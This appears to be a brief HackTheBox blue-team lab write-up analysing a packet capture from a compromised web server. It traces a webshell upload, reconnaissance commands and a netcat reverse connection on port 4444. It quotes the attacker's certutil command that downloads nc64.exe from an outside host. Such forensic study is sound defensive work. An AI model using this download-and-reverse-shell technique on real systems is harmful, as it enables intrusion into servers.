HTB: Intro to Blue Team: Chase
--
Description
One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?
Attack Analysis
Filtering for HTTP traffic to make it clear.
First GET HTTP Requests and Responses from webserver 22.22.22.5
An attacker uploaded a webshell first (authKey=admin).
An attacker executed a command line and downloaded netcat via certutil.
certutil -urlcache -split -f http://22.22.22.7/nc64.exe
Now we can see netcat running on the webserver connecting back to an attacker machine over port 4444
An attacker executed whoami, ipconfig commands on the webserver.